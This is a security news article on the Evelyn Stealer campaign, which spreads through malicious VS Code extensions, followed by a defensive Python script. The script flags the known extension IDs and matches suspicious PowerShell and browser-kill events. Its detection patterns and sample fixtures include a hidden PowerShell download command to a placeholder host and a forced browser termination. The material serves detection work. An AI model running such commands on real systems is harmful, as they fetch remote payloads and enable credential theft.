Evelyn Stealer targets developers via malicious VS Code extensions

Cybersecurity researchers have shared details of a malware campaign targeting software developers via the Microsoft Visual Studio Code (VS Code) extension ecosystem. The campaign delivers a new information-stealing malware dubbed ‘Evelyn Stealer,’ designed to harvest sensitive data by masquerading as legitimate VS Code extensions.

According to Trend Micro, the malware can exfiltrate developer credentials, browser data, and cryptocurrency-related information, and it turns a compromised developer workstation into a potential foothold for further intrusion. The activity specifically targets organizations with software development teams that rely on VS Code and third-party extensions, particularly teams whose workstations hold access to production systems, cloud environments, or digital assets.

The campaign was first documented last month by Koi Security, which identified three malicious VS Code extensions (BigBlack.bitcoin-black, BigBlack.codo-ai, and BigBlack.mrbigblacktheme) that dropped a malicious downloader DLL that launched hidden PowerShell commands to retrieve a second-stage payload.

The payload decrypts the Evelyn Stealer malware and injects it directly into a legitimate Windows process in memory, so that no stealer binary touches disk, which helps it evade detection while collecting and exfiltrating data to a remote server. The malware also includes anti-analysis and anti-virtualization techniques and forcibly terminates browser processes: a running browser keeps its cookie and login databases locked, so killing it gives the stealer uninterrupted access to cookies and stored credentials.
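The following is an added example, not code from Trend Micro, Koi Security or the article, showing two host checks a responder could run against the chain described above: matching a workstation's installed VS Code extensions against the three extension IDs named by Koi Security, and scoring endpoint process-creation records for the hidden, encoded or download-cradle PowerShell that the downloader DLL launches and for the browser termination the stealer performs. Field names follow Sysmon Event ID 1 (ParentImage, Image, CommandLine); the VS Code and PowerShell image names, the indicator threshold, the "same publisher" heuristic and all sample data (the extensions.json entries, the events, the example.invalid URL and the base64 string) are assumptions constructed for the example.

```python
"""Added example: host checks for the Evelyn Stealer VS Code extension campaign.
Not the vendors' code; field names follow Sysmon Event ID 1, sample data is constructed."""
import json
import re
from pathlib import Path

# Extension IDs attributed to the campaign by Koi Security (from the article).
MALICIOUS_EXTENSION_IDS = {
    "bigblack.bitcoin-black",
    "bigblack.codo-ai",
    "bigblack.mrbigblacktheme",
}
# Heuristic (assumption): anything else from the same publisher deserves a look.
MALICIOUS_PUBLISHERS = {ext.split(".", 1)[0] for ext in MALICIOUS_EXTENSION_IDS}

# Assumed process image names; adjust to your EDR's normalisation.
VSCODE_IMAGES = {"code.exe", "code - insiders.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
BROWSER_IMAGES = ("chrome", "msedge", "firefox", "brave", "opera")

# PowerShell accepts unambiguous parameter prefixes, so -w, -win and -WindowStyle all work.
HIDDEN_WINDOW = re.compile(r"-w[a-z]*\s+hidden\b", re.I)
ENCODED_CMD = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Net\.WebClient", re.I)
KILL_BROWSER = re.compile(
    r"(?:taskkill\b.*/im\s+|Stop-Process\b.*-Name\s+)\"?(?:" + "|".join(BROWSER_IMAGES) + r")", re.I)


def flag_installed_extensions(extensions_json_text):
    """Match a VS Code extensions.json (~/.vscode/extensions/extensions.json, a JSON
    array whose entries carry identifier.id as 'publisher.name') against the known-bad
    IDs and publishers. Returns {extension_id: verdict}."""
    verdicts = {}
    for entry in json.loads(extensions_json_text):
        ext_id = str(entry.get("identifier", {}).get("id", "")).lower()
        if not ext_id:
            continue
        if ext_id in MALICIOUS_EXTENSION_IDS:
            verdicts[ext_id] = "known-malicious"
        elif ext_id.split(".", 1)[0] in MALICIOUS_PUBLISHERS:
            verdicts[ext_id] = "same-publisher"
    return verdicts


def scan_local_extensions(home=None):
    """Run the check against the current user's real extension list, if present."""
    path = Path(home or Path.home()) / ".vscode" / "extensions" / "extensions.json"
    return flag_installed_extensions(path.read_text(encoding="utf-8")) if path.exists() else {}


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_process_event(event):
    """Return the list of indicators a process-creation record matches."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    if image in POWERSHELL_IMAGES:
        if parent in VSCODE_IMAGES:
            reasons.append("powershell spawned by VS Code")
        if HIDDEN_WINDOW.search(cmd):
            reasons.append("hidden window")
        if ENCODED_CMD.search(cmd):
            reasons.append("encoded command")
        if DOWNLOAD_CRADLE.search(cmd):
            reasons.append("download cradle")
    if KILL_BROWSER.search(cmd):
        reasons.append("browser termination")
    return reasons


def find_suspicious(events, min_indicators=2):
    """Keep events with at least min_indicators weak indicators (a lone encoded command
    is common in legitimate tooling) or the strong browser-termination indicator."""
    hits = []
    for ev in events:
        reasons = score_process_event(ev)
        if len(reasons) >= min_indicators or "browser termination" in reasons:
            hits.append((ev["Image"], reasons))
    return hits


# Constructed sample data (not real telemetry).
SAMPLE_EXTENSIONS_JSON = json.dumps([
    {"identifier": {"id": "ms-python.python"}, "version": "2024.0.0"},
    {"identifier": {"id": "BigBlack.codo-ai"}, "version": "1.0.2"},
    {"identifier": {"id": "BigBlack.example-placeholder"}, "version": "0.1.0"},
])
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File .\build.ps1"},
    {"ParentImage": r"C:\Windows\System32\rundll32.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c \"(New-Object Net.WebClient)"
                    ".DownloadString('https://example.invalid/stage2')\""},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\taskkill.exe",
     "CommandLine": "taskkill /F /IM chrome.exe /IM msedge.exe"},
]

if __name__ == "__main__":
    print("sample extensions:", flag_installed_extensions(SAMPLE_EXTENSIONS_JSON))
    print("local extensions:", scan_local_extensions())
    for image, reasons in find_suspicious(SAMPLE_EVENTS):
        print(image, "->", ", ".join(reasons))
```

The extension check is a plain inventory match, so it only catches the IDs already published; the process scoring is where coverage against re-published variants comes from, and its threshold is deliberately two weak indicators so that ordinary build scripts with an encoded command do not page anyone.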

